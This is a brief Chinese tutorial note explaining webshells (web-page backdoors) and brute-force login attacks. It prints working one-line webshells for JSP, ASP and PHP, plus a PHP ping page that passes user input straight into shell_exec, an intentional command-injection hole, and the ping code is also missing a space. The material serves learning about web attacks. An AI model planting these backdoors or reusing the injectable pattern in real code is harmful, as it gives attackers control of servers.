webshell
概念
webshell是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当Hacker入侵一个网站后,会把这些asp、php木马的后门文件放在该网站的web目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后呢,他就可以利用web请求的方式,用asp或者php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等一系列操作。
分类
a.根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
b.根据脚本名称分类:jsp、asp、aspx、php
jsp的简单的webshell:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
asp的简单的webshell:
success!!!!<%eval request("cmd")%>
php的简单的webshell:
<?php
$a=exec($_GET["input"]);
echo $a;
?>
用PHP调用cmd命令
<form action="#" method="GET">
<input type="text" name="ip" />
<input type="submit" />
</form>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<?php
if( isset($_GET['ip'])){
$target = $_GET['ip'];
if(stristr(php_uname('s'),'Windows NT')){
$cmd = shell_exec('ping'. $target);
}else{
$cmd = shell_exec('ping -c 3'. $target);
}
$html .="<pre>{$cmd}</pre>";
echo $html;
}
?>
解析思路
1、脚本接收到的GET或POST参数IP的值存放到变量$ target 中;
2、做了一个简单的系统判断后,$ target被带入到shell_exec()中执行运算;
3、运算时拼接一个ping字符串,对$ target 执行ping命令,然后结果保存在$ cmd 中;
4、$ cmd 再存在新的$ html 中,显示在页面;
暴力破解
“暴力破解”是一种攻击手段,在web 攻击中,一般会使用这种攻击手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登陆,直到得到正确的结果。